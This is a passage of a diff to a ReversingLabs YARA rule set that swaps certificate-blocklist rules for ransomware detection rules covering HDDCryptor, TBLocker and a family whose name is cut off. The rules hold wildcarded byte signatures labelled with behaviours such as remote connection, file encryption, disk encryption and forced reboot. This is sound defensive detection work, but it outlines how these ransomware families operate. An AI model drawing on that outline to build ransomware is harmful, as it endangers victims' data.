+            57 FF 93 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 50 57 FF 93 ?? ?? ?? ?? 85
+            C0 74 ?? C6 00 ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8D 93 ?? ??
+            ?? ?? FF 75 ?? 52 51 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 4D ?? 51 57 E8 ??
+            ?? ?? ?? 85 C0 74 ?? 89 45 ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF
+            93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 89 85 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ??
+            ?? 8B 45 ?? 8B 75 ?? 89 06 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 83 BD ??
+            ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 83 ?? ?? ?? ?? 50 56 FF
+            93 ?? ?? ?? ?? 85 C0 74 ?? 40 57 8D BB ?? ?? ?? ?? 89 07 5F E9 ?? ?? ?? ?? 8D B3 ??
+            ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 83 ?? ?? ?? ?? 8B 00 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ??
+            ?? ?? C9 C2
+        }
+		$crypto_file = {
+            55 89 E5 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? E8
+            ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 85 C0 74 ?? 89 45 ?? 8D 83 ?? ?? ?? ?? 8B 00
+            85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 4D ?? 51 56 57 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ??
+            89 45 ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? FF 75 ??
+            FF 93 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 45
+            ?? 8B 5D ?? C9 C2
+        }
+		$crypt_file = {
+            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            5B 8D BD ?? ?? ?? ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D B3 ?? ?? ??
+            ?? 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 89 45 ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 30 FF 93 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 6A ??
+            FF 31 50 FF 36 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 8D B5 ?? ?? ?? ?? 51 6A ?? FF 36 68 ?? ?? ?? ?? FF 30 FF 93 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45
+            ?? 6A ?? FF 75 ?? FF 93 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
+            75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8D 7D ?? 8D 75 ?? 8D 55
+            ?? 52 56 57 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 6A ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 7D ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 57 FF 75 ?? 6A ?? 6A
+            ?? 6A ?? FF 36 FF 93 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 75 ??
+            FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 55 ?? 52 56 57
+            FF 75 ?? FF 93 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D B3 ??
+            ?? ?? ?? FF 06 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 50 FF 93 ?? ?? ?? ??
+            83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
+        }
+		$enum_files_1 = {
+            89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B E8 ??
+            ?? ?? ?? 8D 7D ?? 6A ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D 7D ?? 57 FF 93 ?? ?? ?? ??
+            83 F8 ?? 74 ?? EB ?? 8D 75 ?? 56 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
+        }
+		$enum_files_2 = {
+            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            66 C7 45 ?? ?? ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56
+            FF 75 ?? FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ??
+            0F 84 ?? ?? ?? ?? 89 45 ?? 6A ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 55 ?? 8D B5
+            ?? ?? ?? ?? 52 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 55 ?? 8D B5 ?? ?? ?? ?? 52
+            56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 40 89 45 ?? 8D BD
+            ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 03 45 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 FF 75
+            ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 56 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? A9 ?? ?? ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? E8 ?? ?? ?? ??
+            EB ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75
+            ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ??
+            ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF
+            75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74
+            ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOGIKA, OOO" and pe.signatures [ i ] . serial == "1d:3f:39:f4:81:fe:06:7f:8a:92:89:bb:49:e0:5a:04" and 1592553220 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $enum_files_1 and $enum_files_2 and $crypto_file and $crypt_file and $remote_connection
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7Be35D025E65Cc7A4Ee01F72 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hddcryptor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HDDCryptor ransomware."
 		author = "ReversingLabs"
-		id = "533bcad1-b589-5a05-8f35-32fcb79c7f68"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "2c6a8ca3-0f7a-52b7-af6d-74fa9407feca"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4308-L4324"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HDDCryptor.yara#L1-L157"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dad7ab834a67d36c0b63e45922aea566dc0aaf922be2b74161616b3caea83fdc"
+		logic_hash = "47915f315bb4956507362f56024f5632cb1bcec569ceaf77fe9d7cb9c25d1d8a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HDDCryptor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$deploy_components = {
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 6A ?? 53 0F 85 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB
+            E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ??
+            ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B
+            F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F
+            AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B F8 BA ?? ?? ??
+            ?? 0F AF FE 8B CB E8
+        }
+		$get_shares_info = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? EB ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15
+        }
+		$encrypt_discs = {
+            68 ?? ?? ?? ?? FF 74 24 ?? 0F 57 C0 66 0F 7F 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C9 EB ?? 8D 49 ?? 0F B7 81 ?? ?? ?? ?? 66 89 84 0C ?? ?? ?? ?? 8D 49 ?? 66
+            85 C0 75 ?? 8D 8C 24 ?? ?? ?? ?? 83 C1 ?? 66 8B 41 ?? 8D 49 ?? 66 85 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? A1 ?? ?? ?? ?? 89 41 ?? 0F B7 05 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 66 89 41
+            ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            D7 B9 ?? ?? ?? ?? E8
+        }
+		$create_diskcryptor_service = {
+            83 EC ?? 53 55 56 57 68 ?? ?? ?? ?? 33 ED 8B F2 55 55 8B F9 FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 55 55 55 55 55 FF 74 24 ?? 55 6A ?? 5B 53 6A ?? 68 ?? ?? ?? ?? 56 57 50 FF 15
+            ?? ?? ?? ?? 8B F0 89 5C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 33
+            C9 89 44 24 ?? 41 8D 44 24 ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 53 56 89 4C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B C6 5F 5E 5D 5B 83 C4 ??
+            C3
+        }
+		$extract_diskcryptor_from_resources = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 8B B4 24 ?? ??
+            ?? ?? 33 C0 57 50 89 54 24 ?? 8B E9 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B D8 56
+            0F B7 C9 51 53 FF 15 ?? ?? ?? ?? 8B F0 56 53 FF 15 ?? ?? ?? ?? 56 53 8B F8 FF 15 ??
+            ?? ?? ?? 57 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 E8 ?? ?? ?? ?? 59 FF 74
+            24 ?? 8B D8 56 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 33 FF 83 C4 ?? 8B CF 85 D2 7E ?? 8A 04
+            19 3C ?? 7C ?? 3C ?? 7F ?? 04 ?? 3C ?? 76 ?? 2C ?? 88 04 19 41 3B CA 7C ?? 33 C0 68
+            ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F5 66 8B 45
+            ?? 83 C5 ?? 66 3B C7 75 ?? 8D 7C 24 ?? 2B EE 83 EF ?? 33 C9 66 8B 47 ?? 83 C7 ?? 66
+            3B C1 75 ?? 8B CD C1 E9 ?? F3 A5 8B CD 83 E1 ?? F3 A4 8D 7C 24 ?? 83 EF ?? 33 ED 66
+            8B 47 ?? 8D 7F ?? 66 3B C5 75 ?? A1 ?? ?? ?? ?? 8B 54 24 ?? 8B F2 89 07 66 8B 02 83
+            C2 ?? 66 3B C5 75 ?? 8D 7C 24 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C5 75 ??
+            8B CA 8D 44 24 ?? C1 E9 ?? F3 A5 55 55 6A ?? 55 55 8B CA 83 E1 ?? 68 ?? ?? ?? ?? F3
+            A4 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 55 8D 44 24 ?? 50 FF 74 24 ?? 53 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 40 EB ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
+            C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_using_diskcryptor_p1 = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
+            ?? ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 83 7D ?? ?? 73 ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 75 ?? BA ?? ?? ?? ?? 8B 4E ?? 8A 01 41 88 02 42 84 C0 75 ?? 8B 4E ?? BA
+            ?? ?? ?? ?? 8A 01 41 88 02 42 84 C0 75 ?? 6A ?? 59 BE ?? ?? ?? ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ??
+            33 F6 8D 84 24 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 89 B4 24 ?? ?? ?? ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 7C 24 ?? ?? 8D 44 24 ?? 56 0F 43 44 24 ?? 56 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 DB C7 44
+        }
+		$encrypt_files_using_diskcryptor_p2 = {
+            24 ?? ?? ?? ?? ?? 50 89 5C 24 ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B D0 59 59 85 D2
+            75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 8B D0 8D BC 24 ?? ?? ?? ?? 83 EF ?? 66
+            8B 47 ?? 8D 7F ?? 66 3B C3 75 ?? A1 ?? ?? ?? ?? 83 C2 ?? 89 07 8B F2 66 8B 02 83 C2
+            ?? 66 3B C3 75 ?? 8D BC 24 ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3
+            75 ?? 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 51 50 83 EC ??
+            8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84
+            24 ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8B D6 8B C8
+            E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 53 6A ?? 8D 4C 24 ??
+            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 74 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B F3 EB ?? FF 15 ?? ?? ?? ?? 8B F0 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
+            8B C6 EB ?? 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$reboot = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8D 45 ?? 50 6A ?? FF 15 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 56 56 56 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? F7 D8 1B C0 F7 D8 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "7b:e3:5d:02:5e:65:cc:7a:4e:e0:1f:72" and 1594976445 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $deploy_components ) and ( $get_shares_info ) and ( $encrypt_discs ) ) or ( ( $extract_diskcryptor_from_resources ) and ( $create_diskcryptor_service ) and ( all of ( $encrypt_files_using_diskcryptor_p* ) ) and ( $reboot ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_351Fe2Efdc0Ac56A0C822Cf8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Tblocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TBLocker ransomware."
 		author = "ReversingLabs"
-		id = "ac6b7c6d-781b-5c91-80fe-b822ee00ea7f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "91793018-baf6-5e70-83b6-8793482c3bec"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4326-L4342"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TBLocker.yara#L1-L85"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "46b87c3531e01ba150f056ec3270564426363ef8c58256eeedbcab247c7625e4"
+		logic_hash = "81f0077655ac0e59cd8dc05be602ae500c938668bd57d3cf4a51fbff2a5b6b83"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TBLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$main_ransomware_function_p1 = {
+            00 02 16 28 ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02
+            16 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 16 FE ?? 0A 06 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ??
